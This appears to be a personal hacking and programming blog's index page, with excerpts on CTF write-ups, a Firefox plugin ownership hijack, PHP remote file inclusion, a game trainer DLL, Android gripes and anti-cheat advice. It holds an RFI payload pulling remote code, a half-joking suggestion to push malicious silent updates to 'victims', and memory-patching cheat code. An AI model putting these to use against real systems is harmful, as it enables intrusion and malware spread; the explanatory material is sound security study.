ECTF 2014 write-up (The Annoying Admin)

First of all this is the first CTF that OpenToAll has actually won first place in

So proud


Though it was a student CTF and not widely publicized I’m still happy.

Anyway, this is a write-up for the ECTF 2014 challenge “The annoying admin”. The description is below, and please note that we solved it before the hint was provided!

The chat feature was added to Facelook website and to test it, founder of the company had sent a message in chat to the admin. Admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty.

Annoying Admin

Hint: Admin likes to visit some links which he recieves from people

Read more

Pwnium write-up #2 (Breakpoints)

This write-up will be a little rougher on newbies because there won’t be any C++ or hex-rays here.
re300 (Breakpoints) is an x64 ELF binary which I had to boot up my VM to solve!

If you want to play along, download the binary here, get the disassembler of your choice and GDB ready and let’s have a go.

 ASM |  copy code |? 
01
.text:0000000000400550 start           proc near
02
.text:0000000000400550                 xor     ebp, ebp
03
.text:0000000000400552                 mov     r9, rdx
04
.text:0000000000400555                 pop     rsi
05
.text:0000000000400556                 mov     rdx, rsp
06
.text:0000000000400559                 and     rsp, 0FFFFFFFFFFFFFFF0h
07
.text:000000000040055D                 push    rax
08
.text:000000000040055E                 push    rsp
09
.text:000000000040055F                 mov     r8, offset nullsub_1
10
.text:0000000000400566                 mov     rcx, offset sub_4066B0
11
.text:000000000040056D                 mov     rdi, offset main
12
.text:0000000000400574                 call    ___libc_start_main
13
.text:0000000000400579                 hlt
14
.text:0000000000400579 start           endp
15
Read more

Pwnium write-up #1 (Crackme Fast)

This is a quick write-up of the “Crackme Fast” challenge from Pwnium CTF

Let’s start at the beginning. The challenge stated that you had to download a file from a server, crack that application (retrieve a password from it) and submit it to the authentication server altogether in under 2 seconds. This means the moment the file is downloaded, you have under 2 seconds to finish the challenge to retrieve the flag.

Let’s start with the file itself. When I downloaded the file it saved as “4617155699eb1d2b7a17f7a5bdda27b4.bin”, I then opened it in Notepad++ and xvi32. Notepad++ told me it was some kind of uncompressed archive format containing a single executable. How did I know?

Read more

Parsing HTML with C++ (With extra UTF-8 woes)

So I was tasked with making a C++ project that scraped data from HTML pages.

For those who aren’t in the “know”, there’s no neato HTML DOM library like JSoup in C++. There’s nothing with jQuery-like selectors either. There’s some niche projects here and there (and there is a google project I was turned onto which I decided probably wasn’t for the best, but worth mentioning anyway) but nothing really substantial.

In PHP, you could do a couple things. Either use “Simple HTML DOM Parser“, or use simplexml with XPath. Both kind of suck for their own reasons (Simple HTML DOM Parser is written in PHP and causes tons of resources to be used for simple operations, and simplexml with XPath is… not fun, turns out C++ isn’t much better, but we’ll get to it later).

In JavaScript, you have jQuery. In Java, JSoup. Both are amazing. If I’m scraping something, I’d prefer to use these… but it’s just too bad I don’t use Java for much else besides android, and I don’t know how well nodejs actually works with jQuery, or if it does, or if it has something similar… I’ve never used node. Maybe worth looking into some day.

C++, though, I had to hack. It’s weird, usually you’ll find C++ libraries for anything but in this case the internet didn’t help me out too much, besides this blog post, so I went with it.

The tools I ended up using for my project:

  • CURL
  • MySQL++
  • libxml++
  • libtidy

Read more

Firefox plugin ownership hijacking exploit

So I ran into an interesting issue today.

People develop Mozilla plugins all the time. Some online and on the store, some offline and not on the store at all for all sorts of purposes. Either because they don’t require network access, because they don’t feel they want it known to the general public or because it is proprietary, sensitive software.

Well a friend designed a plugin which was not designed to be released to the public and something absolutely amazing occured. Somebody uploaded his plugin to Mozilla AMO. Mozilla AMO is basically the Firefox plugin store.

What’s even more fun is that this person did not specify an Update URL in his manifest. It all came tumbling down.

If the Update URL is not explicitly overridden, Firefox tries to grab updates from Mozilla AMO even if the plugin was not installed from the store originally. Firefox will also grant ownership over your plugin key to whoever uploaded it to the store first, meaning the actual original author has little recourse.

So, if you happen to find some plugins on github or on the web and want to create some bots with little effort, look no further! Simply upload a modified plugin to Mozilla AMO and watch as silent updates are delivered to your victims!

Free software for everyone!

Seriously though, people who have private plugins including secretive individuals and huge corporations beware.

Birth of a hacking brain

Introduction

I haven’t done a post like this ever, but I thought I’d give my account of a phenomenon which was occurring prior to PHP ‘fixing’ it’s allow_url_include configuration option.

Names of the innocent have been omitted, and details changed to protect, well, me.

Sometime around 2007 a friend of mine made a neat script to parse his access logs. People were trying to exploit his server, repeatedly.
They were attempting to use an exploit known as RFI (Remote File Inclusion).

The concept is simple. PHP has a function called ‘include’, this function executes the PHP file given to it

 PHP |  copy code |? 
1
include('my_file.php');

However, PHP also used to allow you to include remote files by default. This would mean you could do:

 PHP |  copy code |? 
1
include('http://some-other-site.com/test.txt');

People would do things like

 PHP |  copy code |? 
1
include($_GET['action'] . '.php');

If you did

index.php?action=http://some-other-site.com/test.txt%00

You could include your own PHP file and execute arbitrary code.

Okay, explanation over!

Read more

HTML5 with Internet Relay Chat (IRC)

I wrote an UnrealIRCd plugin (well, a proof of concept anyway) that would allow HTML5 clients to connect to your server (leaf or hub, I suppose).

The only real benefit to a fully functioning plugin for HTML5 WebSockets is to remove reliance on Java/Flash, or being able to code a client in Javascript, if that’s your thing.

The repo is here, feel free to check it out. Read more

Crazy Game Fun Times – Deer Hunter Tournament and JFK Reloaded

I decided to write some trainers for dumbass games for dumbass fun, why not?

JFK Reloaded Rapid Fire

 C++ |  copy code |? 
01
02
// This evades the hard-coded bullet record limit (basically, the ballistics screen and replay might fuck up and crash because you shot too many bullets)
03
DWORD WINAPI lpBallisticSanityThread(LPVOID lpParam) {
04
    while(true) {
05
        unsigned long* pdwShotsFired = ( unsigned long* )0x006162AC;
06
 
07
        if( *pdwShotsFired > 0x26 ) {
08
            *pdwShotsFired = 0x24;
09
        }
10
 
11
        Sleep(100);
12
    }
13
 
14
    return 0;
15
}
16
 
17
__declspec( noinline ) VOID InstallPatches() {
18
    memset_s( ( unsigned char* )0x5A1CF8, 0xEB, 1 );
19
    memset_s( ( unsigned char* )0x59F1FA, 0x90, 2 );
20
}
21
 
22
BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved )
23
{
24
    if(ul_reason_for_call == DLL_PROCESS_ATTACH) {
25
        InstallPatches();
26
 
27
        CreateThread(0, 0, lpBallisticSanityThread, 0, 0, 0);
28
    }
29
 
30
    return TRUE;
31
}  
32

Read more

I really don’t like the Android API

Well, you know me, I seem to be pretty decent at just complaining about things. So, let’s dive right into the Android SDK.

The XML
There is a visual designer, but nobody uses it. Nobody should use it. It’s terrible.

I can’t say it’s the fault of XML inherently, maybe it’s just the editor and the rendering that has major issues, but it’s broken as hell in Eclipse and Android Studio and using it is only useful for widgets or nested fragments.

I don’t like it’s HTML+CSS-like design. It feels filthy. It could be a lot worse, though, so let’s put aside this gripe and move to the main issue.

The actual API
When I jumped into android programming, I was so frustrated. Super pissed. That’s because I was stuck in the UI design and restoring states, I gave up.

Later on, a very retarded android developer (people actually pay him) told me to use the AndroidManifest.xml hack to let android handle my orientation changes for me.
Holy fucking shit it was like a brand new world!

No more Parcelable classes, no more savedInstanceState bundles… everything was awesome. Of course, this was all placebo, because in the end I needed to change my methods away from the XML configuration hack (because there is many forms of changing states in Android, and it only handles a few of them).

  • I hate how the OS doesn’t handle states itself.
  • I hate that I have to handle states, and I hate that it is so troublesome. You either have to store specific members of a class, or make your class extend Parcelable, which means writing a lot more lines when you really shouldn’t have to.
  • I hate how much extra typing I have to do to deal with savedInstanceState or retained, nested fragments (which is ultimately what I ended up using, a hell of a lot easier than that retarded bundle bullshit).
  • I don’t like how only some of the XML settings for layouts has a method in an object (Like, for ListView you can set ‘divider’, and ‘dividerHeight’ in XML and Java, but you can’t ‘showDividers’, this is a minor example that I had on hand, but it happens all the time).
  • This is an SDK problem, but it’s also a slight Java problem (depending on who you ask) – Overrides lead to ambiguity. That is because the SDK is ambiguous. Yes, there is Fragment and Activity life cycles in the SDK docs, however that lifecycle isn’t always true in every circumstance. Some overrides are only fired in specific circumstances, and sometimes that information is buried in lines of text elsewhere, and you only find out when you get a NullPointerException or some such thing. Annoying.

Full disclosure, I’m not a professional Java developer or anything, and even I can see that in many ways, a lot of my extra burden would be resolved in my projects by extended classes (I do it sometimes, but probably not nearly as much as I should), so many of these points might be moot. I mean, if I can speed of the development of other things, maybe this burden wouldn’t be so heavy? I don’t know, but I know these things are a burden. It really sucks the energy out of me when I have to make another fragment class just to retain data across orientation changes, app kills, minimize/maximize… etc. It takes up a lot of time that I could be spending on other things, and it seems like it could be a lot easier. That’s just me. Maybe I’m wrong.

It could be that I’m a moron and I’m making this way too hard on myself, it’s happened before. If I am indeed a moron, please comment below and tell me how to do this less verbosely.

The good!
What would a rant be without the things I really enjoy?

  • I like Java’s default classes and how extensive string manipulation is, how easy it is, I like the eclipse editor (although people keep trying to push me into studio). There’s a lot of stuff already done for you, like C#.
  • I like the HUGE amount of libraries which solve problems I’ve not had to solve myself by nature of them existing. Jsoup, Picasso, OkHttp and Joda Time are super.
  • Overrides, while being a problem they are also a godsend – because, well, you can override anything. Ignoring the ambiguity of some SDK functions, this allowed me to make some very cool changes to widgets that wouldn’t have been possible in some other languages. So they’re also good in their own way.
  • Another compliment for Java – Strong typing. Weak types pls go.

Anyway, final bit of info, here’s some screenshots from an app I’ve been making. It’s dumb animu bullshit but it seems at least 120 people are interested in it, since that’s how big my alpha tester group is (Has 120 users by word of mouth on facebook/twitter/etc, it’s a closed group, pretty impressive I think, especially since it’s only been a couple days)

Anti-hacking advice and methods for the amateur game developer.

I hang around game forums sometimes, and the subject of game development pops up every once in a while. I figured I’d write this for people who are indie or amateur developers who might not necessarily have the money to pay an outside developer to protect their game (You can hire me if you do, by the way), but want their game to be somewhat free of the really, really bad hacks that plague poorly made online games.

This post will talk more about concepts that give the developer nasty results and not so much code. If you want to see some anti-hacking code, there’s a tag for that on my blog! Use it!

The netcode, and never trusting the client to do anything.
In an ideal world (for those who don’t like cheating) games would be run on the cloud and every pixel would be delivered to the client, and they’d only be restricted to sending keyboard and mouse input to the server. This comes with a whole bunch of other problems, but ignore those for a moment and really think about it. If the client was never trusted to do anything or handle any data, there would be no hacking. There’d be data to input into our ESP or aimbot calculations and there’d be no data to write, such as in our “no recoil” or “no spread” code. This is pretty much how consoles control hacking, by completely locking out the user. It’s not perfect and people do cheat on consoles, but because consoles actively fight against user input it is much more rare.

Having said all that, I am a consumer advocate and I really, really hate that the gaming industry is going in this direction. However, the lesson should not be lost on people who still want to develop video games on the computer today, without those severe controls.

Exhibit A: The ARMA franchise

Bad design.

This code allows you to disable all keyboard input for admins on an ARMA server. Really.

I’m starting with ARMA because it uses an engine which defies common sense. It is probably the least secure, most insane multiplayer game design I’ve ever seen. It’s bizarre. Read more

Google+